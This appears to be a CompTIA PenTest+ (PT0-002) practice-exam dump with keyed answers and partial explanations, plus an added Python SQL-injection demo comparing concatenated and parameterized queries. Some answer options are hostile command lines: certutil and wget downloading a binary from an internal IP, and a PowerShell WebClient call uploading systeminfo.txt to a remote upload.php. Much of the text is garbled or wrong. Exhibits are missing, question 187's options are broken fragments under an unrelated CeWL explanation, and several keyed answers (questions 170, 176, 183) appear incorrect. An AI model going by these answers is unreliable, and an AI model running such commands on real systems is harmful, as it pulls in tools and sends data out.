Get Ready to Pass the PT0-002 exam with CompTIA Latest Practice Exam
NEW QUESTION # 169
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?
- A. Comma
- B. Semicolon
- C. Single quote
- D. Double dash
Answer: C
Explanation:
A single quote (') is the classic character for testing SQL injection, which occurs when user input is concatenated directly into a database query. A single quote terminates a string literal, so whatever follows it is parsed as SQL rather than data. For example, if the search form builds the query SELECT * FROM products WHERE name LIKE '%user_input%', then entering a single quote as the input breaks the quoting of the LIKE pattern and produces a database error or other unexpected behavior.
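The behaviour described above, as an added example (not code from the exam page): the vulnerable concatenated LIKE query next to a parameterized version, run against a constructed in-memory SQLite table so the effect of a single quote can be compared side by side.

```python
import sqlite3

# Constructed sample rows for the demo; not taken from the exam question.
PRODUCTS = [("laptop bag",), ("laptop stand",), ("o'reilly book",)]


def _connect():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (name TEXT)")
    con.executemany("INSERT INTO products VALUES (?)", PRODUCTS)
    return con


def search_vulnerable(user_input):
    """The pattern the explanation describes: input spliced into the SQL text.
    A lone single quote unbalances the LIKE literal and the query fails."""
    con = _connect()
    sql = "SELECT * FROM products WHERE name LIKE '%" + user_input + "%'"
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.OperationalError as exc:
        # This error is exactly the tell the tester is probing for.
        return "SQL error: " + str(exc)


def search_safe(user_input):
    """Parameterized form: the quote is bound as data, never parsed as SQL.
    LIKE wildcards typed by the user are escaped so they match literally."""
    con = _connect()
    escaped = (user_input.replace("\\", "\\\\")
                         .replace("%", "\\%")
                         .replace("_", "\\_"))
    rows = con.execute(
        "SELECT * FROM products WHERE name LIKE ? ESCAPE '\\'",
        ("%" + escaped + "%",),
    )
    return [row[0] for row in rows]


def probe(user_input):
    """Return both outcomes for one input so the difference is visible."""
    return {"vulnerable": search_vulnerable(user_input),
            "safe": search_safe(user_input)}
```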
NEW QUESTION # 170
A penetration tester conducted a discovery scan that generated the following:
Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?
- A. nmap --open 192.168.0.1-254 | uniq
- B. nmap -o 192.168.0.1-254 | cut -f 2
- C. nmap -sn 192.168.0.1-254 | grep "Nmap scan" | awk '{print $5}'
- D. nmap -oG list.txt 192.168.0.1-254 | sort
Answer: B
NEW QUESTION # 171
A penetration tester gains access to a system and is able to migrate to a user process:
Given the output above, which of the following actions is the penetration tester performing? (Choose two.)
- A. Building a scheduled task for execution
- B. Executing a file on the remote system
- C. Mapping a share to a remote system
- D. Creating a new process on all domain systems
- E. Setting up a reverse shell from a remote system
- F. Adding an additional IP address on the compromised system
- G. Redirecting output from a file to a remote system
Answer: B,C
Explanation:
WMIC.exe is a built-in Microsoft program that allows command-line access to the Windows Management Instrumentation. Using this tool, administrators can query the operating system for detailed information about installed hardware and Windows settings, run management tasks, and even execute other programs or commands.
NEW QUESTION # 172
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
NEW QUESTION # 173
A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?
- A. Ethercap
- B. Nmap
- C. Nikto
- D. Cain and Abel
Answer: C
Explanation:
https://hackertarget.com/nikto-website-scanner/
NEW QUESTION # 174
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:
Which of the following tools will help the tester prepare an attack for this scenario?
- A. Netcat and cURL
- B. Burp Suite and DIRB
- C. Hydra and crunch
- D. Nmap and OWASP ZAP
Answer: B
NEW QUESTION # 175
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?
- A. The executive summary and information regarding the testing company
- B. The rules of engagement from the assessment
- C. A quick description of the vulnerability and a high-level control to fix it
- D. Information regarding the business impact if compromised
Answer: C
Explanation:
The systems administrator and the technical staff are primarily interested in the technical details of the findings and how to fix them.
NEW QUESTION # 176
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
- A. RFID tagging
- B. Meta tagging
- C. Tag nesting
- D. RFID cloning
Answer: B
NEW QUESTION # 177
A penetration tester performs the following command:
curl -I --http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
- A. Option D
- B. Option B
- C. Option A
- D. Option C
Answer: C
NEW QUESTION # 178
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
- A. schtasks /query /fo LIST /v | find /I "Next Run Time:"
- B. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
- C. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
- D. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
Answer: C
Explanation:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
NEW QUESTION # 179
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
- A. Supervisors and controllers are on a separate virtual network by default.
- B. PLCs will not act upon commands injected over the network.
- C. Supervisory systems will detect a malicious injection of code/commands.
- D. Controllers will not validate the origin of commands.
Answer: D
NEW QUESTION # 180
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?
- A. Maintain confidentiality of the findings.
- B. Identify all the vulnerabilities in the environment.
- C. Limit invasiveness based on scope.
- D. Uncover potential criminal activity based on the evidence gathered.
Answer: C
NEW QUESTION # 181
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)
- A. Traffic sniffing
- B. A ping sweep
- C. An Nmap scan
- D. Open-source research
- E. Port knocking
- F. A vulnerability scan
Answer: A,D
NEW QUESTION # 182
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
- A. Eliminate network management and control interfaces.
- B. Enforce enhanced password complexity requirements.
- C. Disable or upgrade SSH daemon.
- D. Disable HTTP/301 redirect configuration.
- E. Implement a better method for authentication.
- F. Create an out-of-band network for management.
Answer: D,F
NEW QUESTION # 183
The results of an Nmap scan are as follows:
Which of the following would be the BEST conclusion about this device?
- A. This device is most likely a proxy server forwarding requests over TCP/443.
- B. This device is most likely a gateway with in-band management services.
- C. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
- D. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
Answer: D
NEW QUESTION # 184
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:
The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?
- A. The command requires the -port 135 option.
- B. The tester input the incorrect IP address.
- C. PowerShell requires administrative privilege.
- D. An account for RDP does not exist on the server.
Answer: D
NEW QUESTION # 185
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
NEW QUESTION # 186
During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise.
While reading the script, the penetration tester noticed the following lines of code:
Which of the following was the script author trying to do?
- A. Spawn a local shell.
- B. Disable NIC.
- C. List processes.
- D. Change the MAC address
Answer: A
Explanation:
The script author was trying to spawn a local shell by using the os.system() function, which executes a command in a subshell. The command being executed is "/bin/bash", which is the path to the bash shell, a common shell program on Linux systems. The script author may have wanted to spawn a local shell to gain more control or access over the compromised system, or to execute other commands that are not possible in the original shell. The other options are not plausible explanations for what the script author was trying to do.
NEW QUESTION # 187
A penetration tester wrote the following Bash script to brute force a local service password:
..ting as expected. Which of the following changes should the penetration tester make to get the script to work?
- A. .e
cho "The correct password is $p" && break)
o "The correct password is $p" I break - B. ( echo "The correct password is $p" && break )
- C. e
cho "The correct password is Sp" && break)
echo "The correct password is $p" && break) - D. ..e
cho "The correct password is $p" && break)
ho "The correct password is $p" I| break - E. .
{ echo "The correct password is $p" && break )
With
Answer: A
Explanation:
CeWL is a tool that crawls a website and builds a wordlist from the data it recovers, for use in cracking passwords on that site. CeWL stands for Custom Word List generator; it is a Ruby script that spiders a given website to a specified depth and returns a list of words that can be used for password cracking or other purposes. CeWL can also generate wordlists from metadata, email addresses, author names, or external links found on the website, which lets a penetration tester build wordlists tailored to the target and improves the odds of a password-cracking attempt. DirBuster is a tool for brute forcing directory and file names on web servers. w3af is a tool for scanning web applications for vulnerabilities and exploits. Patator is a tool for performing brute force attacks against various protocols and services.